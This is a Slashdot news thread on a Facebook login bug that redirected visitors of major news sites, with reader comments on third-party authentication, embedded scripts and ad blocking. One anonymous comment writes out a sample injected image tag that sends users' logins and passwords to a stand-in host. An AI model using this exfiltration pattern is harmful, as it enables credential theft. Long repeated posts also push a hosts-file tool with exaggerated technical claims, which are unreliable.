Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Facebook Breaks Major Websites With Redirection Bug

Soulskill posted about a year and a half ago | from the now-we're-tripping-on-virtual-power-cords dept.

Bug 179

johnsnails writes "Some of the biggest news sites in the world disappeared yesterday when Facebook took over the internet with a redirection bug. Visitors to sites such as The Washington Post, BuzzFeed, the Gawker network, NBC News and News.com.au were immediately transferred to a Facebook error page upon loading their intended site. It was fixed quickly, and Facebook provided this statement: 'For a short period of time, there was a bug that redirected people logging in with Facebook from third party sites to Facebook.com. The issue was quickly resolved, and Login with Facebook is now working as usual.'"

Sorry! There are no comments related to the filter you selected.

so... (5, Insightful)

liamevo (1358257) | about a year and a half ago | (#42831337)

can we please stop relying on third parties for things *you* should be providing to your users.

Re:so... (5, Funny)

Seumas (6865) | about a year and a half ago | (#42831385)

Hey, just because all of my forum stuff comes from Disqus, my word of mouth spreading comes from twitter, facebook, and google plus integrations, and my content comes from automatic AP feeds doesn't mean I don't provide anything myself! I . . . . uh . . . .

Re:so... (5, Funny)

saveferrousoxide (2566033) | about a year and a half ago | (#42832599)

I deal with the goddamn customers!

Re:so... (1)

sinij (911942) | about a year and a half ago | (#42834057)

>>>I deal with the goddamn customers! And if you don't like it, you can program goddamn login page yourself!

Re:so... (1)

rwise2112 (648849) | about a year and a half ago | (#42834091)

I deal with the goddamn customers!

I have people skills, damnit!

Re:so... (1)

LandDolphin (1202876) | about a year and a half ago | (#42834145)

haha

Re:so... (2)

davester666 (731373) | about a year and a half ago | (#42834207)

...said the person who just finished installing an autoreply bot...

Re:so... (4, Interesting)

CastrTroy (595695) | about a year and a half ago | (#42833195)

I know a guy who does this. He pulls in about $50 a month with a site that basically runs itself. The only reason I don't do it is because the "ads" he ends up generating money off of are the kind that pay out when the visitor to his site installs a tool bar or some other nefarious thing. The only reason I wouldn't do that is that I don't think it's ethically correct to lure people into installing stuff they don't want on their computer. But I imagine that someone who's ambitious enough, and who sets up enough sites could generate quite a bit of money like this.

It Has Its Ups and Downs (5, Interesting)

eldavojohn (898314) | about a year and a half ago | (#42831509)

can we please stop relying on third parties for things *you* should be providing to your users.

Clearly it has benefits and disadvantages. One of the disadvantages is displayed in this story. I could name a decent amount of benefits though: 1) you don't have to register again and again every time you want to use some site. 2) you don't suffer from password fatigue. 3) you don't have to worry about no talent ass clowns storing your username and password in plaintext (although you do have to worry about facebook being no talent ass clowns about that). 4) if I just want to stand up a quick little site that is nothing more than CRUD associated to users then all that login stuff can be offloaded to facebook or whomever. 5) from a large corporation standpoint, you can now get additional social data about your users from the facebook api (I know, this isn't necessarily an advantage for the end user and is best viewed as double edged).

Are you opposed to openID too [wikipedia.org] ?

Re:It Has Its Ups and Downs (4, Insightful)

Rockoon (1252108) | about a year and a half ago | (#42831691)

Indeed.

I think many people are in support of third party authentication semantics for non-critical sites..

Even though ultimately facebook is probably a bad choice for it, what else is so ubiquitous as to be a reasonable option that also doesnt suffer the same essential problems (certainly not a google account?)

Re:It Has Its Ups and Downs (5, Interesting)

whargoul (932206) | about a year and a half ago | (#42832051)

...what else is so ubiquitous as to be a reasonable option that also doesnt suffer the same essential problems (certainly not a google account?)

I use Twitter when the option is available only because they don't collect data on me like facebook does. If it's facebook only, I usually won't sign up.

Re:It Has Its Ups and Downs (3, Interesting)

DragonWriter (970822) | about a year and a half ago | (#42832601)

Even though ultimately facebook is probably a bad choice for it, what else is so ubiquitous as to be a reasonable option that also doesnt suffer the same essential problems (certainly not a google account?)

OpenID. Sure, a provider having a similar error could stop users of that provider from logging on to your site, but its not a single point of failure for the entire site, its a single point of failure for the user and all the sites they use it to log into.

Re:It Has Its Ups and Downs (0)

Anonymous Coward | about a year and a half ago | (#42834289)

To prevent that single point of failure I just don't use facebook for login credentials, ever.

Re:It Has Its Ups and Downs (2, Insightful)

DogDude (805747) | about a year and a half ago | (#42831759)

from a large corporation standpoint, you can now get additional social data about your users from the facebook api (I know, this isn't necessarily an advantage for the end user and is best viewed as double edged).

For an individual, there's only one edge: a sharp one. Who in their right mind would want every company/web site to know all of the intimate details of what they're doing on every other web site? Isn't it obvious to people that by signing in with a Facebook ID to web sites, that not only does Facebook track everything done, but then sells that information to everybody else? That's how those extremely complete personal profiles are created about individuals in corporate databases that are then swapped and sold indefinitely. What benefit could this possibly have for individuals?

Re:It Has Its Ups and Downs (2)

Sockatume (732728) | about a year and a half ago | (#42832219)

If Facebook sold that information you'd have a point, but as it's not disclosed in any of their privacy literature that'd be a monstrous and legally actionable breach of their information protection obligations.

Re:It Has Its Ups and Downs (2, Insightful)

DogDude (805747) | about a year and a half ago | (#42832753)

Hey kid, I've got a bridge to sell ya'....

Re: It Has Its Ups and Downs (0)

Anonymous Coward | about a year and a half ago | (#42831805)

No talent ass clowns can still create apps that expose a permanent security token...So people get full access not only to that account but also most of your Facebook. And the process for revoking that access is more difficult than the average password change...

"is best viewed as double edged" LOL (0)

Anonymous Coward | about a year and a half ago | (#42832163)

I think you meant "is best viewed as A double edged SWORD"... stop rewriting the language.

Re:It Has Its Ups and Downs (0)

Anonymous Coward | about a year and a half ago | (#42833357)

Bonus advantage: you don't have to worry about anyone who doesn't use/want to use facebook wanting to use your site.

Re:It Has Its Ups and Downs (1)

intoxination (1806616) | about a year and a half ago | (#42833713)

This wasn't limited to sites that use Facebook Connect though. It also affected sites that have the Facebook Like button on it, as that apparently relies on connect. So you think you got something really simple on your site that an outage like this shouldn't effect, yet it does.

Re:so... (5, Insightful)

orthancstone (665890) | about a year and a half ago | (#42831533)

On one hand, I'd prefer to see authentication in the hands of someone I consider more reliable (like Google) than someone programmer of questionable ability at (Insert Random Dying Newspaper here).

On the other hand, a hearty "HA HA!" does feel appropriate here. They do get what they are asking for by being so deeply tied to a third party.

What's also interesting... (3, Interesting)

raehl (609729) | about a year and a half ago | (#42831807)

...I got this bug on a website I do *NOT* use Facebook to log into, so the Facebook statement appears incorrect in that regard. (I was logged into Facebook in that browser though.)

Re:so... (1)

hobarrera (2008506) | about a year and a half ago | (#42831889)

IMHO, OpenID is better. Whether google is trustworthy or not is a matter of opinion, and google can be just another OpenID provider. If we want a single provider, the world will never settle for a single trusted entity.

Re:so... (1)

squiggleslash (241428) | about a year and a half ago | (#42832443)

Kinda. The thing is that the reliable programmers who specialize in this kind of thing work for companies like Disqus, whose jobs revolve 100% around this. However, random PHB at ${dying newspaper} has never heard of Disqus, but has heard of Facebook, which similarly to the newspaper employs many programmers, few of whom consider it the primary job of their organization to help, and not f--- up, third party websites.

If Disqus (or Livewyre or whatever) ever made this kind of screw up, they'd seriously destroy their credibility, but unfortunately....

Re:so... (1)

deains (1726012) | about a year and a half ago | (#42831763)

Let's just get in touch every CDN in existence and get them to shut down everything they're doing then. Clearly centralising providers of commonly-used resources is an abysmally terrible idea.
 
(Sarcasm, just in case you can't tell)

Re:so... (1)

ElmoGonzo (627753) | about a year and a half ago | (#42832223)

I've less quarrel with the concept of using a 3rd party to verify identity (that's what a driver's license does when we aren't on line) than with the notion of using the services of a "free" site that gets its revenue by tracking its users and selling that information to advertisers and the like. And do I want to stay logged in to something like Facebook when it is exposing my information (not all of which is bogus fiction) to anyone who has access to their API? And yes, Google is doing much of the same as are numerous others.

Re:so... (1)

Dragonslicer (991472) | about a year and a half ago | (#42833665)

Exactly. After all, nobody that's ever written their own authentication code has ever screwed it up.

Re:so... (0)

Anonymous Coward | about a year and a half ago | (#42834131)

Just think, every single one of those websites are feeding Facebook tracking info about it's users, that facebook then resales to advertisers and stuff..

Congrats (5, Insightful)

Anonymous Coward | about a year and a half ago | (#42831347)

If you let others insert scripts into your pages they can steal your visitors.

Maybe it'll make sites think about who they script src from.

Re:Congrats (4, Insightful)

FireFury03 (653718) | about a year and a half ago | (#42831725)

If you let others insert scripts into your pages they can steal your visitors.

Maybe it'll make sites think about who they script src from.

One of the bad things I've noticed recently is that HSBC [hsbc.co.uk] is including objects from third party organisations in their ebanking login pages. I do wonder if any thought has gone into the security of such things, or if HSBC simply don't care (my experience of banks tells me that none of them have a single clue when it comes to internet security).

Re:Congrats (1)

Anonymous Coward | about a year and a half ago | (#42832615)

Use RequestPolicy and you'll be in control of what websites include from third parties.

Re:Congrats (0)

CanHasDIY (1672858) | about a year and a half ago | (#42832693)

If you let others insert scripts into your pages they can steal your visitors.

Maybe it'll make sites think about who they script src from.

One of the bad things I've noticed recently is that HSBC [hsbc.co.uk] is including objects from third party organisations in their ebanking login pages. I do wonder if any thought has gone into the security of such things, or if HSBC simply don't care (my experience of banks tells me that none of them have a single clue when it comes to internet security).

HSBC launders money for drug kingpins and terrorists. [forbes.com]

You should really find a new bank.

Re:Congrats (2, Funny)

Anonymous Coward | about a year and a half ago | (#42833015)

Well if drug kingpins and terrorists use them, they must be a pretty good bank.

Re:Congrats (0)

Anonymous Coward | about a year and a half ago | (#42834129)

Maybe that's why I'm a customer!

And... (1)

Anonymous Coward | about a year and a half ago | (#42831365)

...people wonder i some of us block external crap on sites, not just ads.

Re:And... (0, Offtopic)

Anonymous Coward | about a year and a half ago | (#42831941)

I shudder thinking what havoc you could cause if you'd manage to hijack one of big JS library CDNs.

For example, just imagine every copy of jQuery from Google's CDN also including instructions to add '<img src="http://buttfuck.me/lol?domain=$window.domain&login=$login&pass=$pass">' on clicking login button - even if it'd be up for just a few minutes, you'd still probably get millions of user accounts sent to you.

Economical impact would be huge, with thousands of sites scouring logs and resetting compromised logins and users having to check and reset every password.

Only a tiny minority is uses NoScript, and then some sites require scripts to function - so you should also use some tricks to replace them with locally cached versions. I really hope those CDN servers are in secure location with write access only for verified personnel physically present on site.

Re:And... (2)

lattyware (934246) | about a year and a half ago | (#42833875)

Which is why we should be asking for two-factor auth on every site, and using unique random passwords stored in a password vault for websites that need passwords. That way, if someone gets your password, it's a) useless without your phone b) useless for any other site. Unfortunately, it's extra hassle for developer and end user, so only a few people do it.

Good. (1)

Seumas (6865) | about a year and a half ago | (#42831367)

Serves every one of these websites for being Facebook lemmings.

Re:Good. (2, Funny)

Anonymous Coward | about a year and a half ago | (#42831451)

They prefer to be called facebook serfs

Re:Good. (1)

jadv (1437949) | about a year and a half ago | (#42831711)

Nowadays they call them "employees" because the word "serf" has been banned by the PC crowd.

use adblock+ to block social media extensions (1)

Anonymous Coward | about a year and a half ago | (#42831375)

The fanboy adblock lists include another list you can add which also blocks out all social media badges etc.

Re:use adblock+ to block social media extensions (1)

Hsien-Ko (1090623) | about a year and a half ago | (#42831483)

Ghostery is another weapon in the defense too

Ghostery = Advertiser owned (-1)

Anonymous Coward | about a year and a half ago | (#42831677)

Per my subject above: They're "foxes guard the henhouse" -> http://it.slashdot.org/comments.pl?sid=3445509&cid=42831613 [slashdot.org] so you'd have to be a real 'cluck' to use them (pun intended) & AdBlock? Crippled by default & NO LONGER BLOCKS ALL ADS either!

APK

P.S.=> Just some "FYI" that has concrete solid undeniable & verifiable backing from reputable sources in the link above...

... apk

AdBlock & Ghostery = inferior to hosts (-1, Offtopic)

Anonymous Coward | about a year and a half ago | (#42831613)

Especially on this note of redirection (hosts file hardcodes stop that, for one thing, ALONG WITH ADBANNERS TOO - plus custom hosts files can do 10 things listed below, adblock can't, period...):

---

APK Hosts File Engine 5.0++ 32/64-bit:

http://start64.com/index.php?option=com_content&view=article&id=5851:apk-hosts-file-engine-64bit-version&catid=26:64bit-security-software&Itemid=74 [start64.com]

Which, if you read the list of what it can do for you as an end user of the resulting output it produces listed in the link above, you'll understand how/why...

"It's as strong as steel, & a 3rd of the weight" - Howard Stark from the film "Captain America"

---

Especially vs. competing alternate 'solutions', noted below in AdBlock/Ghostery & yes even DNS servers, next, as 'examples thereof'...

Solutions that used to be good & I even recommended them in security guides I wrote up over the decades now -> http://www.google.com/search?hl=en&tbo=d&output=search&sclient=psy-ab&q=%22HOW+TO+SECURE+Windows+2000/XP%22&btnG=Submit&gbv=1&sei=ka3yUKzxB-6_0QHLroCQCA [google.com]

That did extremely well for myself (and users of them), for Windows users, for "layered-security"/"defense-in-depth" purposes - the BEST THING WE HAVE GOING vs. threats of all kinds, currently!

(Not anymore though, & certainly NOT far as AdBlock's concerned especially, not after this):

---

Adblock Plus To Offer 'Acceptable Ads' Option:

http://news.slashdot.org/story/11/12/12/2213233/adblock-plus-to-offer-acceptable-ads-option [slashdot.org]

(Meaning by default, which MOST USERS WON'T CHANGE, it doesn't block ALL ads - they "souled-out"... talk about "foxes guarding the henhouse")!

---

Plus, Adblock CAN'T DO AS MUCH & not from a single file solution that runs in Ring 0/RPL 0/kernelmode via tcpip.sys, a driver (since it's part of the IP stack & tightly integrated into it) which is far, Far, FAR FASTER than ring 3/rpl 3/usermode apps like browsers, & addons slow them down (known issue in FireFox).

To wit, 10++ things AdBlock can't do, hosts can:

---

1.) Blocking rogue DNS servers malware makers use

2.) Blocking known sites/servers that serve up malware... like known sites/servers/hosts-domains that serve up malicious scripts

3.) Speeding up your FAVORITE SITES that hosts can speed up via hardcoded line item entries properly resolved by a reverse DNS ping

4.) AdBlock works on Mozilla products (browser & email), hosts work on ANY webbound app AND are multiplatform.

5.) AdBlock can't protect external to FireFox email programs, hosts can (think OUTLOOK, Eudora, & others)

6.) AdBlock can't help you blow past DNSBL's (DNS block lists)

7.) AdBlock can't help you avoid DNS request logs (hosts can via hardcoded favorites)

8.) AdBlock can't protect you vs. TRACKERS (hosts can)

9.) AdBlock can't protect you vs. DOWNED or "DNS-poisoned" redirected DNS servers (hosts can by hardcodes)

10.) Hosts are EASIER to manage, they're just a text file (adblock means you had BEST know your javascript, perl, & python (iirc as to what languages are used to make it from source)).

& more... as a tiny 'sampling' & proofs thereof!

---

Same with Ghostery:

---

Evidon, which makes Ghostery, is an advertising company.

They were originally named Better Advertising, Inc., but changed their name for obvious PR reasons.

Despite the name change, let's be clear on one thing: their goal still is building better advertising, not protecting consumer privacy.

Evidon bought Ghostery, an independent privacy tool that had a good reputation.

They took a tool that was originally for watching the trackers online, something people saw as a legitimate privacy tool, and users were understandably concerned.

The company said they were just using Ghostery for research. Turns out they had relationships with a bunch of ad companies and were compiling data from which sites you visited when you were using Ghostery, what trackers were on those sites, what ads they were, etc., and building a database to monetize.

(AND, when confronted about it, they made their tracking opt-in and called it GhostRank, which is how it exists today.)

They took an open-source type tool, bought it, turned it from something that's actually protecting people from the ad industry, to something where the users are actually providing data to the advertisers to make it easier to track them. This is a fundamental conflict of interest.

To sum up:

Ghostery makes its money from selling supposedly de-indentified user data about sites visited and ads encountered to marketers and advertisers. You get less privacy, they get more money.

That's an inverse relationship.

Better Advertising/Evidon continually plays up the story that people should just download Ghostery to help them hide from advertisers.

Their motivation to promote it, however, isn't for better privacy; it's because they hope that you'll opt in to GhostRank and send you a bunch of information.

They named their company Better Advertising for a reason: their incentive is better advertising, not better privacy.

---

Yes, so overall? Absolutely - hosts are superior!

Vs. even DNS servers too (which hosts files can supplement to overcome THEIR shortcomings, as follows):

---

A.) Running another program (sometimes in usermode no less, far, Far, FAR slower than kernelmode by many orders of magnitude & easily attacked) vs. the single hosts file (tightly integrated into the IP stack itself as part of it). ADDING COMPLEXITY & MORE "moving parts" room for error & breakdown!

B.) Wasting CPU cycles, RAM memory, & other forms of I/O to do what a single file can do

C.) Wasting ELECTRICITY (especially if the DNS server is setup as a separate machine) even if run as a service/daemon on a single system as user has

D.) DNS has NUMEROUS faults, & should anyone request a sampling of them? Ask & "ye shall receive"...

---

Thus, using custom hosts actually SUPPLEMENTS DNS servers & secures them vs. the 1/2 decade unpatched Kaminsky bug, worldwide, worst of all @ the ISP Level, & results in BETTER security AND in saving your bandwidth & giving you FASTER host-domain name resolution locally vs. remote DNS servers, especially if a NXDOMAIN results since you do it LOCALLY via verified hardcoded hosts file entries of your favorites, which also gets you speed too as noted), simply to overcome that flaw & others!

Hosts files hardcodes are not only faster, but safer too, simply since my program uses reverse DNS hardcoded entries tests, to the in arpa addr 'tld' that houses that information from the DNSSEC root 13 servers by ICANN & VERISIGN (to proof vs. the Kaminsky redirect flaw (that remains unpatched for 1/2 a decade now on MOST DNS servers worldwide, worst of all, @ the ISP level!) - which are secured vs. that flaw noted above in redirect poisonings & others)

---

HOWEVER:

I don't "hate" DNS servers!

In fact - I use them myself (since I don't attempt to resolve 'every host-domain there is online' via hosts, only my favorites @ the top of the file, 20 of them, which beats hashtable indexing or b-tree binary seeks past 2++ million records no less).

I use specialized FILTERING DNS SERVERS that help block out malicious sites/servers/hosts-domains via DNSBLs:

---

Norton DNS:

http://setup.nortondns.com/ [nortondns.com]

198.153.192.1
198.153.194.1
198.153.192.60
198.153.194.60
198.153.192.50
198.153.194.50
198.153.192.40
198.153.194.40

OpenDNS:

http://www.opendns.com/home-solutions/ [opendns.com]

208.67.222.222
208.67.220.220

ScrubIT DNS:

http://scrubit.com/ [scrubit.com]

67.138.54.100
207.225.209.66

Comodo Secure DNS:

http://www.comodo.com/secure-dns/switch/windows_vista.html [comodo.com]

8.26.56.26
8.20.247.2

---

ALL in layered formation in both my network connection AND my Cisco/LinkSys stateful packet inspecting router.

(Again - for the concept of "layered-security"/"defense-in-depth": The best thing we have going currently vs. malicious threats online & otherwise...)

---

(Resulting in security AND in saving your bandwidth & giving you FASTER host-domain name resolution locally vs. remote DNS servers, especially if a NXDOMAIN results since you do it LOCALLY via verified hardcoded hosts file entries of your favorites, which also gets you speed too as noted), simply to overcome that flaw & others!

Hosts files hardcodes are not only faster, but safer too, simply since my program uses reverse DNS hardcoded entries tests, to the in arpa addr 'tld' that houses that information from the DNSSEC root 13 servers by ICANN & VERISIGN (to proof vs. the Kaminsky redirect flaw (that remains unpatched for 1/2 a decade now on MOST DNS servers worldwide, worst of all, @ the ISP level!) - which are secured vs. that flaw noted above in redirect poisonings & others)

---

* :)

(Beat THAT with a stick... or better yet? With information that disproves my points (to any 'naysayers' or trolls, that is)).

The Advertiser isn't exactly "straight-up" with you either. Witness these events:

---

Adbanners slow you down & consume your bandwidth YOU pay for (40% of your avg. webpage no less):

ADBANNERS SLOW DOWN THE WEB: -> http://tech.slashdot.org/article.pl?sid=09/11/30/166218 [slashdot.org]

---

And people do NOT LIKE ads on the web:

PEOPLE DISLIKE ADBANNERS: http://yro.slashdot.org/yro/08/04/02/0058247.shtml [slashdot.org]

---

As well as this:

Users Know Advertisers Watch Them, and Hate It:

http://yro.slashdot.org/yro/08/04/02/0058247.shtml [slashdot.org]

---

Even WORSE still, is this:

Advertising Network Caught History Stealing:

http://yro.slashdot.org/story/11/07/22/156225/Advertising-Network-Caught-History-Stealing [slashdot.org]

---

Advertisters never intended to honor "DNT" (Do Not Track):

http://yro.slashdot.org/story/12/09/23/1334258/advertisers-never-intended-to-honor-dnt [slashdot.org]

---

AND, neither do others:

http://yro.slashdot.org/story/12/09/30/1435231/think-tanks-website-rejects-browser-do-not-track-requests [slashdot.org]

---

The webserver program folks even "jumped on the bandwagon" in Apache, as far as "DNT":

http://apache.slashdot.org/story/12/09/08/0053235/apache-patch-to-override-ie-10s-do-not-track-setting [slashdot.org]

---

Talk about "crooked" & telling 1/2 truths (as well as making software that was ONCE quite useful & effective, NOT QUITE AS USEFUL & EFFECTIVE by default anymore!)

Now - I truly KNOW this post will no doubt be downmodded, because Advertisers do NOT want this type of information getting out en-masse to enlighten users - they bought out Ghostery, crippled Adblock, but TRY THAT with a local hosts file (good luck!) especially one a user builds himself!

APK

P.S.=> Malware's present in the banner ads you click on as well, & here are some "examples thereof" over time:

---

THE NEXT AD YOU CLICK MAY BE A VIRUS:

http://it.slashdot.org/story/09/06/15/2056219/The-Next-Ad-You-Click-May-Be-a-Virus [slashdot.org]

---

Yahoo, Microsoft's Bing display toxic ads:

http://www.theregister.co.uk/2011/09/16/bing_yahoo_malware_ads/ [theregister.co.uk]

---

Malware torrent delivered over Google, Yahoo! ad services:

http://www.theregister.co.uk/2009/09/24/malware_ads_google_yahoo/ [theregister.co.uk]

---

Rogue ads infiltrate Expedia and Rhapsody:

http://www.theregister.co.uk/2008/01/30/excite_and_rhapsody_rogue_ads/ [theregister.co.uk]

---

Google sponsored links caught punting malware:

http://www.theregister.co.uk/2008/12/16/google_sponsored_links/ [theregister.co.uk]

---

DoubleClick caught supplying malware-tainted ads:

http://www.theregister.co.uk/2007/11/13/doubleclick_distributes_malware/ [theregister.co.uk]

---

Yahoo feeds Trojan-laced ads to MySpace and PhotoBucket users:

http://www.theregister.co.uk/2007/09/11/yahoo_serves_12million_malware_ads/ [theregister.co.uk]

---

Real Media attacks real people via RealPlayer:

http://www.theregister.co.uk/2007/10/23/real_media_serves_malware/ [theregister.co.uk]

---

Attacks Targeting Classified Ad Sites Surge:

http://it.slashdot.org/story/11/02/02/1433210/Attacks-Targeting-Classified-Ad-Sites-Surge [slashdot.org]

---

Hackers Respond To Help Wanted Ads With Malware:

http://it.slashdot.org/story/11/01/20/0228258/Hackers-Respond-To-Help-Wanted-Ads-With-Malware [slashdot.org]

---

Ruskie gang hijacks Microsoft network to push penis pills:

http://www.theregister.co.uk/2010/10/12/microsoft_ips_hijacked/ [theregister.co.uk]

---

Major ISPs Injecting Ads, Vulnerabilities Into Web:

http://it.slashdot.org/story/08/04/19/2148215/major-isps-injecting-ads-vulnerabilities-into-web [slashdot.org]

---

Two Major Ad Networks Found Serving Malware:

http://tech.slashdot.org/story/10/12/13/0128249/Two-Major-Ad-Networks-Found-Serving-Malware [slashdot.org]

---

NY TIMES INFECTED WITH MALWARE ADBANNER:

http://news.slashdot.org/story/09/09/13/2346229/new-york-times-site-pop-up-says-your-computer-is-infected [slashdot.org]

---

MICROSOFT HIT BY MALWARES IN ADBANNERS:

http://apcmag.com/microsoft_apologises_for_serving_malware.htm [apcmag.com]

---

ADOBE FLASH ADS INJECTING MALWARE INTO THE NET:

http://it.slashdot.org/story/08/08/20/0029220/adobe-flash-ads-launching-clipboard-hijack-attacks [slashdot.org]

---

London Stock Exchange Web Site Serving Malware:

http://www.securityweek.com/london-stock-exchange-web-site-serving-malware [securityweek.com]

---

Spotify splattered with malware-tainted ads:

http://www.theregister.co.uk/2011/03/25/spotify_malvertisement_attack/ [theregister.co.uk]

---

Demonoid Down For a Week, Serving Malware Laden Ads:

http://yro.slashdot.org/story/12/08/02/1427257/demonoid-down-for-a-week-serving-malware-laden-ads [slashdot.org]

---

Google's DoubleClick spreads malicious ads (again):

http://www.theregister.co.uk/2009/02/24/doubleclick_distributes_malware/ [theregister.co.uk]

---

Ad networks owned by Google, Microsoft serve malware:

http://www.theregister.co.uk/2010/12/13/doubleclick_msn_malware_attacks/ [theregister.co.uk]

---

Hackers Use Banner Ads on Major Sites to Hijack Your PC:

http://www.wired.com/techbiz/media/news/2007/11/doubleclick [wired.com]

---

More dangerous to click on an online advertisement than an adult content site these days, Cisco said:

http://www.securityweek.com/easier-get-infected-malware-good-sites-shady-sites-cisco-says [securityweek.com]

---

As my list "multiple evidences thereof" as to adbanners & viruses + the fact they slow you down & cost you more (from reputable & reliable sources no less).

(Animats/John Nagle, a member here no less who himself contributed to the IP stack itself & I respect him immensely for it, unlike many here (especially trolls) said it best on advertisers & the web -> http://yro.slashdot.org/comments.pl?sid=3359149&cid=42482289 [slashdot.org] )

... apk

Re:AdBlock & Ghostery = inferior to hosts (1)

omnichad (1198475) | about a year and a half ago | (#42832183)

Oh, great. Good plan. Completely block Facebook with a hosts file. This only affected logged in Facebook users. People who aren't going to add facebook's scripting domains to their hosts file.

NOT about hosts ability to BLOCK (0)

Anonymous Coward | about a year and a half ago | (#42832415)

It's about how hosts hardcodes avoid redirects (hosts can do that)!

I.E. -> You can also avoid DNS servers being unpatched for 1/2 a decade now (even though a fix exists, worst of all, @ the ISP level), AND likely this redirect problem for facebook technically as well:

---

5 Years After Major DNS Flaw Found, Few US Companies Have Deployed Long-term Fix:

http://it.slashdot.org/story/13/01/29/1859257/5-years-after-major-dns-flaw-found-few-us-companies-have-deployed-long-term-fix [slashdot.org]

---

Again - Since hardcodes in hosts determine the host-domain name resolution 1st:

---

Microsoft TCP/IP Host Name Resolution Order:

http://support.microsoft.com/kb/172218 [microsoft.com]

PERTINENT QUOTE/EXCERPT:

"The client checks to see if the name queried is its own.

The client then searches a local Hosts file, a list of IP address and names stored on the local computer.

A sample hosts file, Hosts.sam, is installed with the TCP/IP protocol showing the proper format.

Domain Name System (DNS) servers are queried.

If the name is still not resolved, NetBIOS name resolution sequence is used as a backup. This order can be changed by configuring the NetBIOS node type of the client."

---

Loaded @ OS startup too, by the IP stack itself (since host are TIGHTLY INTEGRATED as part of it also) running in Ring 0/RPL 0/kernelmode (vs. far, Far, FAR SLOWER usermode/Ring 3/RPL 3 & slower code in addons (ala AdBlock's python/javascript code) + browser addons SLOW DOWN WEBBROWSERS (known issue in FireFox, stack up a few & see for yourself)...

AND

Hosts are referred to by default FIRST by ANY WEBBOUND APP:

Including webbrowsers & their addons (which CANNOT resolve ip addresses "by themselves") which makes AdBlock or Ghostery, redundant (especially since they're advertiser)...

APK

P.S.=>

Re:NOT about hosts ability to BLOCK (1)

UnknownSoldier (67820) | about a year and a half ago | (#42833973)

On all my systems I replace hosts with this nice updated ad/spy/trojan blocking one:
        http://winhelp2002.mvps.org/hosts.txt [mvps.org]

Can fellow /. readers recommend any other good ones?

Custom hosts = Superior to AdBlock (-1, Troll)

Anonymous Coward | about a year and a half ago | (#42831729)

Especially in regard to redirection bugs (even from DNS poisonings, ala the unpatched for 1/2 a decade especially @ the ISP level, in the Kaminsky flaw) for BOTH added speed & security:

APK Hosts File Engine 5.0++ 32/64-bit:

http://start64.com/index.php?option=com_content&view=article&id=5851:apk-hosts-file-engine-64bit-version&catid=26:64bit-security-software&Itemid=74 [start64.com]

Which, if you read the list of what it can do for you as an end user of the resulting output it produces listed in the link above, you'll understand how/why...

"It's as strong as steel, & a 3rd of the weight" - Howard Stark from the film "Captain America"

---

Especially vs. competing alternate 'solutions', noted below in AdBlock/Ghostery & yes even DNS servers, next, as 'examples thereof'...

Solutions that used to be good & I even recommended them in security guides I wrote up over the decades now -> http://www.google.com/search?hl=en&tbo=d&output=search&sclient=psy-ab&q=%22HOW+TO+SECURE+Windows+2000/XP%22&btnG=Submit&gbv=1&sei=ka3yUKzxB-6_0QHLroCQCA [google.com]

That did extremely well for myself (and users of them), for Windows users, for "layered-security"/"defense-in-depth" purposes - the BEST THING WE HAVE GOING vs. threats of all kinds, currently!

(Not anymore though, & certainly NOT far as AdBlock's concerned especially, not after this):

---

Adblock Plus To Offer 'Acceptable Ads' Option:

http://news.slashdot.org/story/11/12/12/2213233/adblock-plus-to-offer-acceptable-ads-option [slashdot.org]

(Meaning by default, which MOST USERS WON'T CHANGE, it doesn't block ALL ads - they "souled-out"... talk about "foxes guarding the henhouse")!

---

Plus, Adblock CAN'T DO AS MUCH & not from a single file solution that runs in Ring 0/RPL 0/kernelmode via tcpip.sys, a driver (since it's part of the IP stack & tightly integrated into it) which is far, Far, FAR FASTER than ring 3/rpl 3/usermode apps like browsers, & addons slow them down (known issue in FireFox).

To wit, 10++ things AdBlock can't do, hosts can:

---

1.) Blocking rogue DNS servers malware makers use

2.) Blocking known sites/servers that serve up malware... like known sites/servers/hosts-domains that serve up malicious scripts

3.) Speeding up your FAVORITE SITES that hosts can speed up via hardcoded line item entries properly resolved by a reverse DNS ping

4.) AdBlock works on Mozilla products (browser & email), hosts work on ANY webbound app AND are multiplatform.

5.) AdBlock can't protect external to FireFox email programs, hosts can (think OUTLOOK, Eudora, & others)

6.) AdBlock can't help you blow past DNSBL's (DNS block lists)

7.) AdBlock can't help you avoid DNS request logs (hosts can via hardcoded favorites)

8.) AdBlock can't protect you vs. TRACKERS (hosts can)

9.) AdBlock can't protect you vs. DOWNED or "DNS-poisoned" redirected DNS servers (hosts can by hardcodes)

10.) Hosts are EASIER to manage, they're just a text file (adblock means you had BEST know your javascript, perl, & python (iirc as to what languages are used to make it from source)).

& more... as a tiny 'sampling' & proofs thereof!

---

Same with Ghostery:

---

Evidon, which makes Ghostery, is an advertising company.

They were originally named Better Advertising, Inc., but changed their name for obvious PR reasons.

Despite the name change, let's be clear on one thing: their goal still is building better advertising, not protecting consumer privacy.

Evidon bought Ghostery, an independent privacy tool that had a good reputation.

They took a tool that was originally for watching the trackers online, something people saw as a legitimate privacy tool, and users were understandably concerned.

The company said they were just using Ghostery for research. Turns out they had relationships with a bunch of ad companies and were compiling data from which sites you visited when you were using Ghostery, what trackers were on those sites, what ads they were, etc., and building a database to monetize.

(AND, when confronted about it, they made their tracking opt-in and called it GhostRank, which is how it exists today.)

They took an open-source type tool, bought it, turned it from something that's actually protecting people from the ad industry, to something where the users are actually providing data to the advertisers to make it easier to track them. This is a fundamental conflict of interest.

To sum up:

Ghostery makes its money from selling supposedly de-indentified user data about sites visited and ads encountered to marketers and advertisers. You get less privacy, they get more money.

That's an inverse relationship.

Better Advertising/Evidon continually plays up the story that people should just download Ghostery to help them hide from advertisers.

Their motivation to promote it, however, isn't for better privacy; it's because they hope that you'll opt in to GhostRank and send you a bunch of information.

They named their company Better Advertising for a reason: their incentive is better advertising, not better privacy.

---

Yes, so overall? Absolutely - hosts are superior!

Vs. even DNS servers too (which hosts files can supplement to overcome THEIR shortcomings, as follows):

---

A.) Running another program (sometimes in usermode no less, far, Far, FAR slower than kernelmode by many orders of magnitude & easily attacked) vs. the single hosts file (tightly integrated into the IP stack itself as part of it). ADDING COMPLEXITY & MORE "moving parts" room for error & breakdown!

B.) Wasting CPU cycles, RAM memory, & other forms of I/O to do what a single file can do

